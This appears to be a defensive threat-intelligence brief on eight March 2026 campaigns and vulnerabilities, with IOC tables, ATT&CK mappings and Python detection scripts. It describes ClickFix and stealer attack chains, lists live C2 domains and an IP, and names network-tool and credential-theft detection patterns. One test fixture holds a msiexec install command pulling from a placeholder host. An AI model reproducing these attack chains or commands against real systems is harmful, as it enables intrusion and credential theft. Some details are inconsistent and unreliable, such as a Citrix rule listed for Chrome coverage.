1. LeakNet Ransomware: ClickFix + Deno “Bring Your Own Runtime” Chain
Summary
LeakNet has graduated from buying access to making their own — and they brought JavaScript along for the ride. The group now delivers ClickFix lures via compromised websites, then uses the legitimate Deno JS/TS runtime to execute Base64-encoded payloads directly in memory, skipping disk and blending into developer tooling noise. ReliaQuest published full technical details on March 17, calling the tactic “BYOR” (Bring Your Own Runtime). The consistency of the post-exploitation sequence is LeakNet’s biggest weakness for defenders.
What’s New (Last 24 Hours)
- ReliaQuest published a full technical breakdown of LeakNet’s new initial access chain (ClickFix via compromised legitimate sites) and Deno-based in-memory loader
- Attack scripts confirmed to follow the Romeo\*.ps1 (VBS initiator) and Juliet\*.vbs naming pattern
- Post-exploitation sequence: DLL sideloading via jli.dll loaded by Java from C:\ProgramData\USOShared, credential discovery via klist, lateral movement via PsExec, and exfiltration to Amazon S3 buckets
- The ClickFix lure delivers a fake CAPTCHA that instructs the user to paste an msiexec.exe command into the Windows Run dialog
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| msiexec.exe spawned from browser or Run dialog | Process | T1218.007 – Msiexec | EDR Process Create | Alert on msiexec.exe with unusual parent (browser, or explorer triggered by Run) |
| Romeo\*.ps1 / Juliet\*.vbs file naming pattern | File | T1059.001 – PowerShell | EDR File Create / Script Block Logs | Hunt for VBS/PS1 files with Romeo or Juliet in the name in temp/user dirs |
| deno.exe executing outside development directories | Process | T1204.002 – Malicious File | EDR Process Create | Alert on deno.exe execution from non-dev paths (AppData, ProgramData, Temp) |
| Base64-encoded JavaScript payload executed in memory via Deno | TTP | T1027 – Obfuscated Files or Information | EDR Memory / Script Block Logs | Hunt for deno.exe with --eval or inline Base64 args |
| jli.dll loaded by java.exe from C:\ProgramData\USOShared | File / DLL | T1574.002 – DLL Side-Loading | EDR Image Load | Alert on java.exe loading DLLs from ProgramData\USOShared |
| klist execution for Kerberos ticket enumeration | Command | T1558 – Steal or Forge Kerberos Tickets | EDR Process Create | Alert on klist.exe spawned from non-admin or scripted context |
| PsExec used for lateral movement post-compromise | Tool | T1570 – Lateral Tool Transfer | EDR Process Create / Network | Alert on psexec.exe or psexesvc.exe outside authorized admin windows |
| Outbound traffic to Amazon S3 buckets for exfiltration | Network | T1567.002 – Exfiltration to Cloud Storage | Proxy / Firewall | Detect high-volume outbound to s3.amazonaws.com from non-cloud workloads |
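The process-create rules in the table above, run over a handful of sample EDR events. This is an added example, not ReliaQuest's or the brief's own code; the event dictionary shape and the sample telemetry are constructed, and the list of "suspect" roots is an assumption to tune per estate.

```python
"""Evaluate EDR process-create events against the LeakNet chain rules above.

Added example, not ReliaQuest's or the brief's own code.  The event shape (a
dict with process / parent / cmdline / image / files keys) stands in for a real
EDR export and is an assumption; the sample events are constructed.
"""
import re
from pathlib import PureWindowsPath

# Parents the brief calls unusual for msiexec: browsers, or explorer.exe (Run dialog).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}
# User-writable roots where deno.exe and Romeo*/Juliet* scripts should not live (tune per estate).
SUSPECT_ROOTS = {"appdata", "programdata", "temp", "downloads"}
SCRIPT_NAME = re.compile(r"^(romeo|juliet).*\.(ps1|vbs)$", re.IGNORECASE)
B64_ARG = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long Base64-looking token
EVAL_ARG = re.compile(r"(^|\s)(eval|--eval)(\s|$)")


def _in_suspect_root(path: str) -> bool:
    return bool(SUSPECT_ROOTS & {p.lower() for p in PureWindowsPath(path).parts})


def match_rules(ev: dict) -> list[str]:
    """Return the name of every table rule the event satisfies (empty list if none)."""
    hits = []
    name = PureWindowsPath(ev.get("process", "")).name.lower()
    parent = PureWindowsPath(ev.get("parent", "")).name.lower()
    cmd = ev.get("cmdline", "")
    # T1218.007: msiexec launched from a browser or via the Run dialog
    if name == "msiexec.exe" and parent in BROWSERS:
        hits.append("msiexec-unusual-parent")
    # T1204.002 / T1027: Deno outside dev paths, or evaluating an inline Base64 blob
    if name == "deno.exe":
        if _in_suspect_root(ev.get("process", "")):
            hits.append("deno-nondev-path")
        if EVAL_ARG.search(cmd) and B64_ARG.search(cmd):
            hits.append("deno-inline-base64")
    # T1574.002: java.exe loading jli.dll out of ProgramData\USOShared
    image = ev.get("image", "")
    if name == "java.exe" and PureWindowsPath(image).name.lower() == "jli.dll" \
            and "usoshared" in image.lower():
        hits.append("jli-sideload-usoshared")
    # T1059.001: Romeo*/Juliet* scripts created in temp or user directories
    if any(SCRIPT_NAME.match(PureWindowsPath(f).name) and _in_suspect_root(f)
           for f in ev.get("files", [])):
        hits.append("romeo-juliet-script")
    return hits


def triage(events) -> dict:
    """Map event index -> matched rules, for every event that matched at least one."""
    return {i: hits for i, ev in enumerate(events) if (hits := match_rules(ev))}


# Constructed sample telemetry, not real LeakNet data (hosts and users are invented).
SAMPLE_EVENTS = [
    {"process": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "msiexec.exe /i https://example.invalid/update.msi /qn"},
    {"process": r"C:\Users\alice\AppData\Local\deno\deno.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "deno.exe eval " + "QUJD" * 12},
    {"process": r"C:\Program Files\Java\bin\java.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "java.exe -jar app.jar", "image": r"C:\ProgramData\USOShared\jli.dll"},
    {"process": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wscript.exe Juliet1.vbs", "files": [r"C:\Users\alice\AppData\Local\Temp\Juliet1.vbs"]},
    {"process": r"C:\Users\alice\dev\.deno\bin\deno.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "deno.exe run main.ts"},  # benign developer use: no hits
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["process"], hits)
```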
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
Summary
A sophisticated multi-variant campaign — now called “Claude Fraud” by 7AI — is targeting developers and security practitioners by exploiting the Claude.ai and VS Code brands. Two confirmed attack paths: a macOS Google Ads vector delivering the MacSync infostealer via a ClickFix-style terminal command, and a trojanized VS Code extension executing PowerShell silently on Windows. Over 15,600 victims have been publicly documented. The attack is clever precisely because it targets people who should know better — and Squarespace-hosted fake pages are still live.
What’s New (Last 24 Hours)
- 7AI Threat Research published full technical breakdown covering both macOS and Windows attack paths (March 17)
- Two confirmed C2 domains: a2abotnet[.]com (macOS/MacSync) and claude-code.official-version[.]com (Windows); wildcard block recommended: *.official-version[.]com
- Primary Windows detection signal: Code.exe → powershell.exe → mshta.exe with remote URL
- macOS detection signal: osascript spawned following curl or base64 decode execution
- MacSync targets macOS Keychain, browser credentials, session cookies, and crypto wallets; sends via HTTP POST with hardcoded auth token
- The original claude.ai artifact vector was taken down; operators immediately pivoted to a Squarespace-hosted fake page within the same ad campaign
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| a2abotnet[.]com | C2 Domain | T1071.001 – Web Protocols | DNS / Proxy | Block and alert on any DNS resolution or HTTP traffic |
| claude-code.official-version[.]com | C2 Domain | T1071.001 – Web Protocols | DNS / Proxy | Block immediately; wildcard block *.official-version[.]com |
| Code.exe → powershell.exe → mshta.exe with remote URL | Process Chain | T1218.005 – Mshta | EDR Process Create | Alert on Code.exe (VS Code) spawning powershell.exe which spawns mshta.exe with URL argument |
| osascript spawned after curl or base64 decode | Process | T1059.002 – AppleScript | EDR (macOS) | Hunt for osascript execution with parent curl or shell decode context |
| Base64-encoded bash command from terminal (macOS ClickFix) | Command | T1059.004 – Unix Shell | EDR (macOS) Process / Shell Logs | Alert on bash -c with base64 -d piped to sh/bash in interactive terminal sessions |
| MacSync HTTP POST with hardcoded auth token to C2 | Network | T1041 – Exfiltration Over C2 Channel | Proxy / NDR | Detect POST requests to a2abotnet[.]com; look for User-Agent spoofing macOS browser strings |
| Trojanized VS Code extension installing silently | File | T1176 – Browser Extensions | EDR File / Registry | Monitor VS Code extension installs outside marketplace or with unusual publisher certs |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
3. Payload Ransomware: Babuk Derivative with ESXi Targeting and ETW Blinding
Summary
A new ransomware group calling itself “Payload” emerged in February and is already hitting hospitals, energy companies, and telecom providers across seven countries. The Windows binary is a well-implemented Babuk derivative using Curve25519 + ChaCha20, and it comes with an ESXi locker that parses vmInventory to find and encrypt VMs in parallel. Its self-removal via NTFS alternate data streams and ETW patching to blind EDRs make it a serious hunting challenge. The in-memory string MakeAmericaGreatAgain and the FBIthread-pool-%d / expand 32-byte kFBI constants are reliable detection anchors.
What’s New (Last 24 Hours)
- GBHackers published reverse engineering analysis on March 17 with confirmed detection signatures
- Group claimed Royal Bahrain Hospital as victim (110 GB exfiltrated, deadline March 23)
- Total claimed victims: 12 organizations, 2,603 GB stolen data
- ESXi locker confirmed: parses vmInventory to target VM disks and encrypts them with threaded encryption
- Windows binary kills backup/security tools, deletes shadow copies, wipes event logs, and patches ETW functions to blind endpoint detection
- Binary self-removes via NTFS alternate data stream trick
- Mutex name: MakeAmericaGreatAgain — unique and detectable
- Many AV engines currently mislabel it as Babuk due to code reuse
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| Mutex: MakeAmericaGreatAgain | Mutex | T1486 – Data Encrypted for Impact | EDR / Memory | Hunt for processes creating this mutex — high-confidence Payload indicator |
| In-memory string expand 32-byte kFBI (Windows) | Memory Artifact | T1486 – Data Encrypted for Impact | EDR Memory Scan / YARA | YARA rule: scan memory for expand 32-byte kFBI string adjacent to ChaCha20 sigma constant |
| FBIthread-pool-%d string in Linux/ESXi ELF binary | Memory Artifact | T1486 – Data Encrypted for Impact | YARA / AV / EDR (Linux) | Scan ESXi host memory and staging paths for FBIthread-pool string pattern |
| .payload file extension appended to encrypted files | File | T1486 – Data Encrypted for Impact | EDR File Create | Alert on rapid mass file renaming with .payload extension |
| Shadow copy deletion via vssadmin or PowerShell | Command | T1490 – Inhibit System Recovery | EDR Process Create | Alert on vssadmin.exe delete shadows or WMI-based shadow deletion |
| ETW patching to disable EDR telemetry | TTP | T1562.001 – Disable or Modify Tools | EDR / Kernel Telemetry | Monitor for NtTraceControl or WriteProcessMemory targeting ntdll ETW functions |
| vmInventory file access on ESXi hosts | File Access | T1082 – System Information Discovery | ESXi Syslog / File Audit | Alert on unexpected processes reading /vmfs/volumes/*/vmInventory |
| Ransom note creation across file shares | File | T1486 – Data Encrypted for Impact | EDR File Create | Alert on bulk creation of identically named TXT/HTML files across shares |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
4. Chrome Zero-Days CVE-2026-3909 & CVE-2026-3910 Added to CISA KEV
Summary
Google patched two zero-days in Chrome that are actively being exploited in the wild — both now in the CISA KEV catalog with a federal patch deadline of March 27. CVE-2026-3909 is an out-of-bounds write in Skia (the 2D graphics library), and CVE-2026-3910 is an improper restriction flaw in the V8 JavaScript engine. Both are drive-by exploits: a victim browses to a crafted page and the exploit fires silently. CISA has not confirmed ransomware use, but memory corruption primitives like these are standard precursors to sandbox escape and code execution.
What’s New (Last 24 Hours)
- CISA added both CVE-2026-3909 (Skia OOB write) and CVE-2026-3910 (V8 improper restriction) to KEV on March 17
- Federal deadline for patching: March 27, 2026
- Exploit delivery vector: malicious/compromised HTML page — no user interaction beyond browsing required
- CVE-2026-3909 confirmed exploitable via remotely crafted HTML, leading to memory corruption and potential code execution
- CVE-2026-3910 targets V8 sandbox restrictions within Chromium’s JavaScript engine
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|
| Chrome/Chromium processes spawning unexpected child processes after page load | Process | T1203 – Exploitation for Client Execution | EDR Process Create | Alert on chrome.exe or chromium spawning shell, cmd, powershell, or network tools as children |
| Outbound connections from renderer process to non-CDN IPs after browse event | Network | T1189 – Drive-by Compromise | EDR Network / NDR | Monitor for unexpected outbound from Chrome renderer sandbox processes |
| Chrome version below patched build on endpoints | Software | T1203 – Exploitation for Client Execution | Asset Inventory / Endpoint Management | Immediately identify and patch all Chromium-based browsers (Chrome, Edge, Opera); check version via google-chrome --version |
| Suspicious browser child process spawned on macOS | Process | T1203 – Exploitation for Client Execution | EDR (macOS) | Suspicious Browser Child Process Elastic rule fires when Chrome spawns unexpected binaries |
Potential Detection Coverage Based on MITRE ATT&CK Technique
| Source | Detections | Coverage |
|---|---|---|
| Splunk | Cisco Secure Firewall - Citrix NetScaler Memory Overread Attempt | No direct Splunk rule for Chrome memory exploitation; network-layer coverage via firewall rules blocking malicious page sources; deploy browser version compliance checks via Splunk UBA or asset inventory |
| Elastic | Suspicious Browser Child Process | Covers post-exploitation child process spawning from Chrome on macOS; this is the highest-value existing detection for browser exploit post-exploitation |
| Sigma | Suspicious Browser Child Process - MacOS | Covers macOS Chrome child process anomalies; no Windows Sigma rule specifically targets Chromium renderer sandbox escape child processes — custom rule recommended for chrome.exe spawning cmd/powershell |
Sources
5. Wing FTP Server CVE-2025-47813 Added to CISA KEV — Attack Chain Enabler
Summary
CISA added CVE-2025-47813 to KEV on March 16 — a medium-severity info-disclosure bug in Wing FTP Server that leaks the local installation path via a malformed UID cookie on /loginok.html. By itself, meh. But paired with CVE-2025-47812 (CVSS 10.0, already weaponized since July 2025 to run Lua payloads and install RMM tools), this becomes a reliable two-step attack chain: path disclosure unlocks the RCE. Patch deadline for federal agencies: March 30.
What’s New (Last 24 Hours)
- CISA formally added CVE-2025-47813 to KEV catalog (March 16/17 reporting window)
- Aviatrix TRC analysis confirmed: attackers are chaining CVE-2025-47813 path disclosure with CVE-2025-47812 RCE for privilege escalation and lateral movement
- Exploitation path: authenticated request to /loginok.html with oversized UID cookie value → error message reveals local server path → path used to target CVE-2025-47812 RCE
- Prior CVE-2025-47812 exploitation involved downloading malicious Lua files, reconnaissance, and RMM tool installation
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| HTTP GET/POST to /loginok.html with oversized UID cookie | Web Request | T1190 – Exploit Public-Facing Application | Web/App Server Logs | Alert on requests to /loginok.html with UID cookie value length > OS max path (260 bytes Windows, 4096 Linux) |
| Wing FTP Server error response containing local file path | Log Pattern | T1190 – Exploit Public-Facing Application | Web/App Server Logs | Look for Wing FTP error log entries containing full filesystem paths — these indicate CVE-2025-47813 triggering |
| Unexpected Lua file execution within Wing FTP context | Process | T1059 – Command and Scripting Interpreter | EDR Process Create | Alert on lua.exe or Lua script execution spawned from Wing FTP server processes |
| RMM tool installation (Atera, AnyDesk, etc.) after FTP exploitation | Process | T1219 – Remote Access Software | EDR Process Create | Hunt for RMM installers executed from Wing FTP server working directory |
| Wing FTP Server version ≤ 7.4.3 | Software | T1190 – Exploit Public-Facing Application | Asset Inventory | Inventory all Wing FTP deployments; patch to ≥ 7.4.4 immediately |
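The first two table rows as a log check, written as an added example (not Wing FTP's or Aviatrix's code): it flags /loginok.html requests whose UID cookie exceeds the platform's maximum path length, and error-log lines that leak an absolute filesystem path. The access-log layout (one request per line with the raw Cookie header appended) and the sample lines are constructed; the install path in the error sample is a placeholder.

```python
"""Log check for the CVE-2025-47813 trigger described above: a request to
/loginok.html whose UID cookie is longer than the host's maximum path.

Added example; not Wing FTP's or Aviatrix's code.  The log layout (one request
per line with the raw Cookie header appended) and the sample lines are
constructed; adapt LINE to your server's actual access-log format.
"""
import re

# Thresholds from the brief: MAX_PATH on Windows, PATH_MAX on Linux.
MAX_PATH = {"windows": 260, "linux": 4096}

LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'cookie="(?P<cookie>[^"]*)"$'
)
UID = re.compile(r'(?:^|;\s*)UID=(?P<val>[^;]*)')
# Error-log text that leaks an absolute filesystem path (Windows drive or common Unix root).
LEAKED_PATH = re.compile(r'(?:[A-Za-z]:\\[^\s"]+|/(?:usr|opt|home|var)/[^\s"]+)')


def uid_cookie_length(cookie_header: str) -> int:
    """Length of the UID cookie value, 0 if the cookie is absent."""
    m = UID.search(cookie_header)
    return len(m.group("val")) if m else 0


def flag_loginok_requests(lines, platform="windows"):
    """Return (source, uid_length) for each /loginok.html request whose UID exceeds the platform limit."""
    limit = MAX_PATH[platform]
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or not m.group("path").startswith("/loginok.html"):
            continue
        n = uid_cookie_length(m.group("cookie"))
        if n > limit:
            hits.append((m.group("src"), n))
    return hits


def flag_path_disclosure(error_lines):
    """Return error-log lines containing a full filesystem path (the CVE-2025-47813 symptom)."""
    return [line for line in error_lines if LEAKED_PATH.search(line)]


# Constructed sample logs (RFC 5737 test addresses; the install path is a placeholder).
ACCESS_LOG = [
    '203.0.113.7 - - [16/Mar/2026:09:12:01 +0000] "POST /loginok.html HTTP/1.1" 200 512 cookie="UID=' + "A" * 300 + '"',
    '198.51.100.4 - - [16/Mar/2026:09:12:05 +0000] "GET /loginok.html HTTP/1.1" 200 512 cookie="UID=3f9c1a; lang=en"',
    '198.51.100.9 - - [16/Mar/2026:09:13:00 +0000] "GET /index.html HTTP/1.1" 200 1024 cookie="UID=' + "B" * 500 + '"',
]
ERROR_LOG = [
    r'[16/Mar/2026:09:12:01] session error: cannot open C:\PLACEHOLDER_INSTALL_DIR\session\x.lua',
    '[16/Mar/2026:09:12:05] login ok for user demo',
]

if __name__ == "__main__":
    print("oversized UID on Windows:", flag_loginok_requests(ACCESS_LOG))
    print("path disclosure lines:", flag_path_disclosure(ERROR_LOG))
```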
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
6. ACRStealer + HijackLoader: NT Syscall Evasion and AFD-Based C2
Summary
G DATA published a deep analysis of ACRStealer (now integrated into HijackLoader infrastructure) showing a significant evasion upgrade: the malware has ditched Win32 API calls in favor of raw NTCalls and WoW64 syscalls to bypass user-mode hooks. It has also swapped its C2 comms from Dead Drop Resolver to NTSockets via the Ancillary Function Driver (AFD), blending with legitimate HTTPS. Steam accounts, Chrome cookies, and DPAPI-protected browser credentials are primary targets. The analysis was published March 12 and entered the 24h window via the X/ETLabs threat intelligence summary from March 17.
What’s New (Last 24 Hours)
- G DATA full technical analysis surfaced via ETLabs threat intelligence summary (March 17)
- C2 communication shifted from Dead Drop Resolver to NTSockets / Ancillary Function Driver (AFD) to avoid high-level API detection
- Malware locates ntdll.dll, resolves functions via modified djb2 hash, uses WoW64 transition gate to bypass user-mode hooks
- App Bound Encryption bypass to extract raw AES master keys from browser versions that implement it
- PowerShell used for secondary payload execution and process hollowing
- Compiled binary renamed to hex on victim hosts
- Active IOCs: 13 files, 1 IP, 1 domain, 1 URL, 2 hashes (retrieve from G DATA report)
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| Process named hex executing from user-writable paths | Process | T1036.005 – Match Legitimate Name or Location | EDR Process Create | Alert on hex.exe or hex process from AppData, Temp, or Downloads — not a standard system binary |
| NTSocket / AFD driver direct calls from non-system processes | API | T1071.001 – Web Protocols | Kernel Telemetry / EDR | Monitor for processes making direct AFD syscalls (NtDeviceIoControlFile targeting \Device\Afd) outside browser/system context |
| ntdll.dll loaded and functions enumerated via modified djb2 hash | Memory | T1055 – Process Injection | EDR Memory Scan | Hunt for processes that load ntdll and resolve exports dynamically (no import table entries) — behavior visible via ETW |
| DPAPI CryptUnprotectData called from non-browser process | API | T1555.003 – Credentials from Web Browsers | EDR API Monitor | Alert on CryptUnprotectData called by non-browser processes accessing %APPDATA%\Local\Google\Chrome\User Data |
| PowerShell spawned for process hollowing / secondary payload | Process | T1059.001 – PowerShell | EDR Process Create | Alert on powershell.exe spawned with encoded command or from non-admin parent in user context |
| Steam session files accessed from non-Steam process | File Access | T1552.001 – Credentials in Files | EDR File Access | Alert on reads to %LOCALAPPDATA%\Steam\config\loginusers.vdf from non-steam.exe processes |
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources
7. CVE-2026-32746: Critical Unpatched GNU InetUtils telnetd RCE (CVSS 9.8)
Summary
A critical out-of-bounds write vulnerability in the GNU InetUtils telnet daemon (telnetd) allows an unauthenticated remote attacker to execute arbitrary code with root privileges — no credentials needed, no user interaction required. The flaw resides in the LINEMODE Set Local Characters (SLC) suboption handler and is exploitable during the initial connection handshake, before any login prompt appears. Since telnetd typically runs as root under inetd/xinetd, successful exploitation gives immediate root access. No patch is available yet (expected by April 1, 2026). Israeli cybersecurity firm Dream discovered and disclosed the flaw on March 11, with public technical details published March 18.
What’s New (Last 24 Hours)
- Full technical details published March 18 by multiple sources including The Hacker News, CybersecurityNews, and GBHackers
- CVE-2026-32746 assigned with CVSS 9.8 — maximum network exploitability
- Exploitation occurs during the initial Telnet option negotiation phase (before authentication), meaning standard login audit logs will NOT capture the attack
- All GNU InetUtils versions through 2.7 are vulnerable (versions 1.9.3 through 2.7 confirmed)
- No patch available — fix expected no later than April 1, 2026
- The attack vector is a specially crafted LINEMODE SLC suboption message with oversized payload sent during connection handshake
- CWE-77 (command injection) classification
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| LINEMODE SLC suboption with payload > 90 bytes on port 23 | Network Signature | T1190 – Exploit Public-Facing Application | IDS/IPS (Snort/Suricata) | Deploy IDS rule: alert on Telnet LINEMODE SLC suboption negotiation packets exceeding 90 bytes — this is the pre-auth exploit trigger |
| Inbound connections to port 23 from external IPs | Network | T1190 – Exploit Public-Facing Application | Firewall / Network Flow | Immediately audit all internet-facing port 23 services; block external access to Telnet where possible |
| Unexpected shell spawning from in.telnetd or telnetd process | Process | T1059 – Command and Scripting Interpreter | EDR Process Create | Alert on telnetd spawning processes other than login shells (e.g., wget, curl, nc, python, perl) |
| New files created in /tmp or world-writable dirs by telnetd child process | File | T1105 – Ingress Tool Transfer | EDR File Create / Auditd | Monitor for file creation in /tmp or /dev/shm by processes with telnetd ancestry |
| GNU InetUtils version ≤ 2.7 on any host | Software | T1190 – Exploit Public-Facing Application | Asset Inventory | Inventory all systems running telnetd; disable or firewall-restrict immediately until patch is available |
| Lateral movement from compromised telnetd host (root shell) | TTP | T1021 – Remote Services | NDR / Auth Logs | Hunt for new SSH/RDP sessions originating FROM known telnetd hosts, especially with root-level credentials |
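A passive version of the table's first row, written as an added example (not GNU InetUtils code and not an IDS product's rule): it walks a captured client-to-server Telnet byte stream, unescapes suboption framing, and reports LINEMODE SLC suboptions whose body exceeds the brief's 90-byte threshold. Option and suboption codes are from RFC 1184; the sample streams are constructed.

```python
"""Passive check for the CVE-2026-32746 trigger described above: a Telnet
LINEMODE (option 34) SLC (suboption 3) negotiation whose body exceeds 90 bytes.

Added example for IDS-style inspection of a captured server-bound byte stream;
not GNU InetUtils code.  Sample streams are constructed.  Option/suboption
codes are from RFC 1184; the 90-byte threshold is the brief's.  The counted
length includes the leading SLC code byte, so tune SLC_LIMIT if your sensor
measures differently.
"""
IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE
LINEMODE, SLC = 34, 3
SLC_LIMIT = 90  # bytes of suboption body the brief says to alert above


def iter_suboptions(stream: bytes):
    """Yield (option, body) for each complete IAC SB <opt> ... IAC SE block.

    An escaped 0xFF inside a suboption (IAC IAC) is unescaped to one data byte,
    so body lengths reflect what the daemon would actually process.  A
    truncated trailing suboption is ignored rather than guessed at.
    """
    i, n = 0, len(stream)
    while i + 1 < n:
        if stream[i] != IAC:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd != SB:
            # WILL/WONT/DO/DONT carry one option byte; other commands are two bytes
            i += 3 if cmd in (WILL, WONT, DO, DONT) else 2
            continue
        option = stream[i + 2] if i + 2 < n else None
        j, body = i + 3, bytearray()
        while j < n:
            if stream[j] == IAC and j + 1 < n:
                if stream[j + 1] == SE:
                    break
                if stream[j + 1] == IAC:
                    body.append(IAC)
                    j += 2
                    continue
            body.append(stream[j])
            j += 1
        else:
            return  # ran off the end without IAC SE: truncated suboption
        yield option, bytes(body)
        i = j + 2


def oversized_slc(stream: bytes):
    """Return the body lengths of LINEMODE SLC suboptions above SLC_LIMIT."""
    return [len(b) for opt, b in iter_suboptions(stream)
            if opt == LINEMODE and b[:1] == bytes([SLC]) and len(b) > SLC_LIMIT]


def _suboption(option: int, body: bytes) -> bytes:
    """Frame a suboption for the test fixtures, doubling 0xFF as the protocol requires."""
    return bytes([IAC, SB, option]) + body.replace(b"\xff", b"\xff\xff") + bytes([IAC, SE])


# Constructed streams: a normal SLC negotiation (eight 3-byte triplets) and one with an oversized body.
NORMAL = bytes([IAC, WILL, LINEMODE]) + _suboption(LINEMODE, bytes([SLC]) + bytes([1, 2, 3]) * 8)
OVERSIZED = NORMAL + _suboption(LINEMODE, bytes([SLC]) + b"\x00" * 120)

if __name__ == "__main__":
    print("normal stream:", oversized_slc(NORMAL))
    print("oversized stream:", oversized_slc(OVERSIZED))
```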
Potential Detection Coverage Based on MITRE ATT&CK Technique
MITRE ATT&CK Mapping
| Technique | ID | Phase |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Initial Access |
| Command and Scripting Interpreter | T1059 | Execution |
| Ingress Tool Transfer | T1105 | Command and Control |
| Remote Services | T1021 | Lateral Movement |
Sources
8. Konni APT: EndRAT Deployment via Spear-Phishing and KakaoTalk Account Hijacking
Summary
North Korea-linked threat group Konni (also tracked as UAC-0149 in some frameworks) has been running a multi-stage espionage campaign targeting South Korean individuals involved in North Korean human rights work. The attack starts with a spear-phishing email delivering a malicious LNK file inside a ZIP archive, which quietly installs EndRAT (an AutoIt-based RAT), RftRAT, and RemcosRAT for layered persistence. The distinguishing feature: after compromising a host, Konni hijacks the victim’s KakaoTalk desktop session and selectively sends malicious files to trusted contacts — turning a compromised individual into a distribution node. Genians published the full technical analysis on March 16, with wide reporting on March 17.
What’s New (Last 24 Hours)
- Genians published full technical analysis of Konni’s integrated spear-phishing + KakaoTalk propagation campaign (March 16-17)
- Three RAT families confirmed on a single victim host: EndRAT (AutoIt), RftRAT, and RemcosRAT — indicating high-value target selection
- Initial LNK execution uses cmd.exe to spawn 32-bit PowerShell via the SysWOW64 directory path — a technique to sidestep 64-bit security controls
- PowerShell script locates the LNK file by matching a specific file size rather than hardcoded filename — resilient to renaming
- Persistence established via Windows scheduled tasks
- C2 infrastructure distributed across Finland, Japan, and the Netherlands; RftRAT C2 linked to known Konni IP 96.62.214[.]5 (Japan)
- Post-compromise: attacker maintained long-term access, exfiltrated internal documents, and weaponized KakaoTalk to propagate malware to the victim’s contacts using North Korea-themed filenames as lures
Actionable Intel
| Artifact | Type | ATT&CK Technique | Data Source | How to Use |
|---|---|---|---|---|
| 96.62.214[.]5 (Japan-based RftRAT C2) | C2 IP | T1071.001 – Web Protocols | Firewall / Proxy / NDR | Block and alert on any traffic to this IP — linked to historical Konni infrastructure |
| LNK file inside ZIP attachment spawning cmd.exe → powershell.exe (SysWOW64) | Process Chain | T1059.001 – PowerShell | EDR Process Create | Alert on cmd.exe spawning powershell.exe from C:\Windows\SysWOW64 with LNK parent from user download/temp paths |
| PowerShell script that locates files by size rather than name | TTP | T1059.001 – PowerShell | Script Block Logs (4104) | Hunt for PowerShell scripts using Get-ChildItem with -Length or file size matching logic in script block logs |
| Scheduled task created for RAT persistence | Persistence | T1053.005 – Scheduled Task | EDR / Windows Event 4698 | Alert on scheduled tasks created by PowerShell or cmd.exe spawned from LNK execution context |
| EndRAT (AutoIt-compiled executable) | Malware | T1059.010 – AutoHotKey & AutoIT | EDR Process Create | Hunt for AutoIt-compiled executables (AutoIt3.exe or compiled .a3x) running from user-writable paths |
| RftRAT / RemcosRAT deployed alongside EndRAT | Malware | T1219 – Remote Access Software | EDR Process Create / Network | Monitor for RemcosRAT behavioral signatures (mutex patterns, registry run keys) and outbound connections to non-standard ports |
| KakaoTalk desktop application sending files to contacts without user interaction | Lateral / Propagation | T1534 – Internal Spearphishing | EDR Process / File Create | Alert on KakaoTalk process creating or sending files when no keyboard/mouse input is detected (automation indicator) |
| North Korea-themed document filenames sent via KakaoTalk | Social Engineering | T1566.001 – Spearphishing Attachment | Email/Messaging Gateway | Hunt for files with Korean-language North Korea-related filenames distributed through messaging platforms |
Potential Detection Coverage Based on MITRE ATT&CK Technique
MITRE ATT&CK Mapping
| Technique | ID | Phase |
|---|---|---|
| Spearphishing Attachment | T1566.001 | Initial Access |
| PowerShell | T1059.001 | Execution |
| Scheduled Task | T1053.005 | Persistence |
| Internal Spearphishing | T1534 | Lateral Movement |
| Remote Access Software | T1219 | Command and Control |
| Web Protocols | T1071.001 | Command and Control |
Sources